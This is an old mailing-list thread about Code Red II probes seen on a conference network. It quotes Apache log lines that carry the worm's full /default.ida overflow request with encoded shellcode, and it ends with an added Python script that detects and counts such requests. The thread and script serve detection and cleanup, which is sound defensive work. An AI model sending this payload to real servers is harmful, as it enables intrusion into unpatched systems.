--On 08/07/2001 9:21 AM -0400 Bobby Krupczak
<rdk(_at_)cc(_dot_)gatech(_dot_)edu> wrote:
>> Well, folks, my packet suckers have shown a Code Red II attack from a
>> machine on the IETF meeting net. It's 217.33.140.38 -- if you have
>> that address, you need to disinfect and patch your machine. For the
>> rest of you, be careful...

> Do you always snoop on traffic at IETFs?
> Just curious. Don't read anything else into my question.

You don't have to snoop. Just run a webserver on port 80 on your local host
and look at the virus trying to attack your local laptop.
I run a local apache, and the logs are full of things like these:
217.33.136.83 - - [07/Aug/2001:14:32:44 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
217.33.24.50 - - [07/Aug/2001:14:36:21 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
paf
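
An added example, not part of the original thread: a small Python filter that picks requests of the shape quoted above out of an Apache common-format access log and counts them per source address. The sample log lines, the documentation-range addresses and the `MIN_PAD` threshold are constructed for illustration.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$'
)

# Shape of the requests quoted in the thread: /default.ida? then a long run
# of one filler letter, then %uXXXX-encoded words. MIN_PAD is an assumed
# threshold, chosen well above any ordinary query string.
MIN_PAD = 64
PROBE_RE = re.compile(
    r'^/default\.ida\?([A-Za-z])\1{%d,}(?:%%u[0-9A-Fa-f]{4})+' % (MIN_PAD - 1)
)

def find_probes(lines):
    """Return (host, time, status) for each request matching the probe shape."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not common log format; skip rather than guess
        if PROBE_RE.match(m.group("target")):
            hits.append((m.group("host"), m.group("time"), int(m.group("status"))))
    return hits

def count_sources(hits):
    """Count matching requests per source address."""
    return Counter(host for host, _, _ in hits)

# Constructed sample input (addresses from the documentation ranges).
PAD = "X" * 224
TAIL = "%u9090%u6858%ucbd3%u7801" * 3
SAMPLE = [
    f'192.0.2.10 - - [07/Aug/2001:14:32:44 +0100] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 404 271',
    f'192.0.2.10 - - [07/Aug/2001:14:40:02 +0100] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 404 271',
    f'198.51.100.7 - - [07/Aug/2001:14:36:21 +0100] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 404 271',
    '203.0.113.5 - - [07/Aug/2001:14:37:00 +0100] "GET /index.html HTTP/1.0" 200 1043',
    '203.0.113.5 - - [07/Aug/2001:14:38:00 +0100] "GET /default.ida?x=1 HTTP/1.0" 404 271',
]

if __name__ == "__main__":
    for host, n in count_sources(find_probes(SAMPLE)).most_common():
        print(f"{host}\t{n} matching request(s)")
```

Each address it reports is a machine that sent the request, which is the list of hosts that need the disinfect-and-patch treatment mentioned at the top of the thread.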